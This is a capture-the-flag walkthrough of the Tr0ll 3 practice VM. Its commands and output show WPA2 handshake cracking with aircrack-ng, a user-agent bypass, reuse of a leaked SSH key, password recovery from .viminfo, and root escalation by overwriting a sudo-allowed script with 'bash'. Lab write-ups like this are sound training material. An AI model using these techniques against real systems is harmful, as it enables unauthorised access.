Tr0ll 3 – Please don’t feed the Troll (Walkthrough)

This post is also available in: Deutsch

The third episode of the Tr0ll series from @Maleus21 is a classic Boot-2-Root VM. Our goal is to move through different levels of users and finally gain root privileges to read the flag from /root/flag.txt. The following writeup is the summary for my solution to achieve this goal.

Level 0: start

The login information for the first user start with the password here is displayed in the start screen after the virtual machine boots up.

Tr0ll 3 - Startbildschirm

An initial port scan using nmap also shows that currently only SSH is available on port 22. However, this at least allows us to work on the machine via our own host.

basto@Malice:~$ ssh start@
start@'s password: here
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


In the home directory of the user start we find the two folders bluepill and redpill.

start@Tr0ll3:~$ ls -al *
total 12
drwxrwxr-x 2 start start 4096 Jun 18  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   18 Jun 17  2015 awesome_work

total 12
drwxrwxr-x 2 start start 4096 Jun 17  2015 .
drwx------ 8 start start 4096 Aug 22 12:51 ..
-rw-rw-r-- 1 start start   17 Jun 17  2015 this_will_surely_work

The file awesome_work contains nothing but the URL http://bfy.tw/ODa. If we visit the given link, we will be forwarded to www.lmgtfy.com (Let me Google that for you) with the query “How do you make a hacker waste time”. So it’s pretty obvious that this clue is a dead end and was placed there as a joke.

basto@Malice:~$ curl http://bfy.tw/ODa
<html><body>You are being <a href="http://www.lmgtfy.com/?q=how+do+you+make+a+hacker+waste+time%3F">redirected</a>.</body></html>%   

As the story progresses, we are presented with similar information again and again, just to serve as a distraction. The machine lives up to its name and “trolls” us wherever it is possible.

The file this_will_surely_work in the redpill directory contains the string step2:Password1!. Our instinct tells us that these have to be the next credentials. But if we try to log in with the given information, we only receive an error message. Yet again, this is only a decoy.

First Clues

With the command find / -type f -perm 0777 2>/dev/null we can list files that can be read and edited by all users regardless of their owner. This allows us to identify the first actual clues:

start@Tr0ll3:~$ find / -type f -perm 0777 2>/dev/null

On the one hand, we can read the file wytshadow.cap in the directory /var/log/.dist-manage/. This appears to be a capture of network traffic including a WPA2 handshake.

start@Tr0ll3:~$ tcpdump -r /var/log/.dist-manage/wytshadow.cap
23:40:52.736808 Authentication (Open System)-1: Successful
23:40:52.742448 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.743986 Authentication (Open System)-2: 
23:40:52.746024 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.748053 Assoc Response AID(1) : PRIVACY : Successful
23:40:52.750120 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.752176 EAPOL key (3) v2, len 95
23:40:52.753704 Acknowledgment RA:18:d6:c7:3f:23:89 (oui Unknown) 
23:40:52.755752 EAPOL key (3) v1, len 117
23:40:52.757806 Acknowledgment RA:f8:94:c2:f4:e5:a2 (oui Unknown) 
23:40:52.759857 EAPOL key (3) v2, len 151

The password of the user wytshadow can probably be retrieved if we succeed in cracking the handshake.

The file gold_star.txt in the directory /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/ on the other hand contains numerous 10-character strings and serves us as a dictionary in our attempt to recover the password.

aircrack-ng -w gold_star.txt wytshadow.cap
aircrack-ng Ausgabe mit geknacktem Passwort

aircrack-ng spits out the correct password gaUoCe34t1 in a couple of minutes and with the new credentials we can now login as the user wytshadow:

start@Tr0ll3:~$ su wytshadow
Password: gaUoCe34t1

Level 1: wytshadow

If we look through the home directory of wytshadow, the file oohfun immediately catches our attention. This file has the SUID bit set, which allows us to run the program with the permissions of the user genphlux.

wytshadow@Tr0ll3:~$ ls -al
total 48
drwx------  5 wytshadow wytshadow 4096 Aug 22 09:21 .
drwxr-xr-x 10 root      root      4096 Jun 19  2015 ..
-rw-------  1 wytshadow wytshadow  297 Aug 22 09:21 .bash_history
-rw-r--r--  1 wytshadow wytshadow  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 wytshadow wytshadow 3637 Jun 17  2015 .bashrc
drwx------  2 wytshadow wytshadow 4096 Jun 17  2015 .cache
drwx------  3 wytshadow wytshadow 4096 Aug  1 01:50 .gnupg
drwxrwxr-x  3 wytshadow wytshadow 4096 Aug 22 06:40 .local
-rwsrwxrwx  1 genphlux  root      8566 Jun 17  2015 oohfun
-rw-r--r--  1 wytshadow wytshadow  675 Jun 17  2015 .profile

However, when we actually run the oohfun, we just keep getting the output iM Cr@zY L1k3 AAA LYNX:

wytshadow@Tr0ll3:~$ ./oohfun 
iM Cr@zY L1k3 AAA LYNX
iM Cr@zY L1k3 AAA LYNX

If we examine the file content using strings, we can see that it contains the following line:

/lol/bin/run.sh -b

Unfortunately, we can’t modify run.sh, because the parent directory lol is also owned by the user genphlux.

wytshadow@Tr0ll3:~$ ls -al / | grep lol
drwsr-x--x   8 genphlux root     4096 May 22  2009 lol

In Linux, all commands that we can execute with root privileges can be listed with the command sudo -l:

wytshadow@Tr0ll3:~$ sudo -l
[sudo] password for wytshadow:
Matching Defaults entries for wytshadow on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wytshadow may run the following commands on Tr0ll3:
    (root) /usr/sbin/service nginx start

We can see that the user wytshadow is allowed to start the nginx web server service, which is what we are doing next:

wytshadow@Tr0ll3:~$ sudo service nginx start

Doing a local check of the open ports using netstat confirms the successful start of the web server. We can now see the new service on port 8080.

wytshadow@Tr0ll3:~$ netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0  *               LISTEN

However, we cannot visit the web service since all requests get rejected with a 403 Forbidden error message.

basto@Malice:~$ curl
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>

To narrow down the problem, we open the file /etc/nginx/sites-ed/default and take a look at the default configuration of the nginx web server. At the very beginning we notice the following block:

# Default server configuration
server {
        listen 8080 default_server;
        listen [::]:8080 default_server;
            if ($http_user_agent !~ "Lynx*"){
                return 403;

If requests do not include the user-agent Lynx, the server will always respond with a 403 error. Since the file is unfortunately read-only, we cannot change the configuration. However, using curl we can append our own user-agent header in the expected format.

basto@Malice:~$ curl -H "User-Agent: Lynx Basto"

We can now use the credentials received in the response to log in as the user genphlux.

wytshadow@Tr0ll3:~$ su genphlux
Password: HF9nd0cR!

Level 2: genphlux

As always, we first take a look at the home directory of the new user.

genphlux@Tr0ll3:~$ ls -al
total 52
drwx------  5 genphlux genphlux 4096 Aug 22 10:09 .
drwxr-xr-x 10 root     root     4096 Jun 19  2015 ..
-rw-------  1 genphlux genphlux  273 Aug 22 10:09 .bash_history
-rw-r--r--  1 genphlux genphlux  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 genphlux genphlux 3637 Jun 17  2015 .bashrc
drwx------  2 genphlux genphlux 4096 Jun 17  2015 .cache
drwx------  3 genphlux genphlux 4096 Aug  1 04:03 .gnupg
drwxrwxr-x  3 genphlux genphlux 4096 Aug 22 09:22 .local
-rw-rw-r--  1 genphlux genphlux 1675 Jun 18  2015 maleus
-rw-r--r--  1 genphlux genphlux  675 Jun 17  2015 .profile
-rw-------  1 genphlux genphlux 5649 Jun 17  2015 .viminfo
-rw-rw-r--  1 genphlux genphlux  931 Aug  2 15:56 xlogin

The file xlogin is just an HTML page that is a directory listing for the web directory /xlogin, which does not help us in any way.


  <title>Index of /xlogin</title>
<h1>Index of /xlogin</h1>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="maleus">maleus</a></td><td align="right">2015-06-18 00:27  </td><td align="right">1.6K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
<address>Apache/2.4.29 (Ubuntu) Server at Port 80</address>

On the contrary, the file maleus is much more interesting. It appears to contain an RSA key, most likely to connect via SSH.


Now we try to log in with the private key for the user maleus. However, the SSH service prohibits us from using certificate files that have too broad permissions set. As a result, we have to first narrow down the file permissions in advance.

genphlux@Tr0ll3:~$ chmod 600 maleus 
genphlux@Tr0ll3:~$ ssh -i maleus maleus@
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/advantage>

Failed to connect to <https://changelogs.ubuntu.com/meta-release-lts>. Check your Internet connection or proxy settings

Level 3.1: maleus (private key)

Since we do not yet have any knowledge of the actual password, we are currently unable to list the executable root commands using sudo -l. However, there are already several files in the home directory that deserve our attention.

maleus@Tr0ll3:~$ ls -al
total 80
drwx------  6 maleus maleus 4096 Dec 19 07:05 .
drwxr-xr-x 10 root   root   4096 Jun 19  2015 ..
-rw-------  1 maleus maleus   42 Dec 19 07:05 .bash_history
-rw-r--r--  1 maleus maleus  220 Jun 17  2015 .bash_logout
-rw-r--r--  1 maleus maleus 3637 Jun 17  2015 .bashrc
drwx------  2 maleus maleus 4096 Jun 17  2015 .cache
-rwxrwxr-x  1 maleus maleus   37 Aug 22 10:04 dont_even_bother
drwx------  3 maleus maleus 4096 Aug  1 03:48 .gnupg
-rw-rw-r--  1 maleus maleus  145 Jun 18  2015 index.html
drwxrwxr-x  3 maleus maleus 4096 Aug 22 09:47 .local
-rw-r--r--  1 maleus maleus  675 Jun 17  2015 .profile
drwx------  2 maleus maleus 4096 Jun 18  2015 .ssh
-rw-------  1 maleus maleus 1301 Aug  2 16:02 .viminfo
-rw-rw-r--  1 maleus maleus  931 Aug 22 09:55 xlogin

If we look at the source code of index.html, it seems that the next clue is immediately revealed.


<img src="pic.jpg">
<!-- Wow, looking at the source code, you are truly l33t! The next step uses fido:x4tPl! >

Unfortunately, it’s not possible to login as the user fido with the given password. It seems as if the troll has yet again played with our emotions.

Likewise, we get misled by the file dont_even_bother. If we run it, we are prompted to enter a password.

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : 

 Wrong Password

A quick look at the strings contained in the file will reveal the required value:

maleus@Tr0ll3:~$ strings dont_even_bother
Enter the password : 

maleus@Tr0ll3:~$ ./dont_even_bother

 Enter the password : xl8Fpx%6

 Correct Password 

 Your reward is just knowing you did it! :-P

So it looks like we still haven’t gotten anywhere with this user.

The file .viminfo contains the history of commands that were typed in the Vim text editor. Among other things, this file also contains the following excerpt, which seems to include the input of a user password:


# Registers:
""1     LINE    0
"2      LINE    0
"3      LINE    0

Level 3.2: maleus (password)

If we now try to execute the command sudo -l with the new-found password, we will get our next hint.

maleus@Tr0ll3:~$ sudo -l 
[sudo] password for maleus: 
Matching Defaults entries for maleus on Tr0ll3:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User maleus may run the following commands on Tr0ll3:
    (root) /home/maleus/dont_even_bother

As we can see, the user maleus has the ability to execute the file /home/maleus/dont_even_bother with the permissions of the root user.

We can’t do much with the current version of the file, but our user is permitted to modify it. Thus, we overwrite dont_even_bother with the command to start a new shell.

maleus@Tr0ll3:~$ echo "bash" > dont_even_bother

Next we execute the overwritten code with sudo permissions.

maleus@Tr0ll3:~$ sudo ./dont_even_bother
root@Tr0ll3:~# id
uid=0(root) gid=0(root) groups=0(root)

Level 4: root

As the final step we can now use our root privileges to read the contents of the flag:

root@Tr0ll3:~# cat /root/flag.txt 
You are truly a Jedi!

Twitter Proof: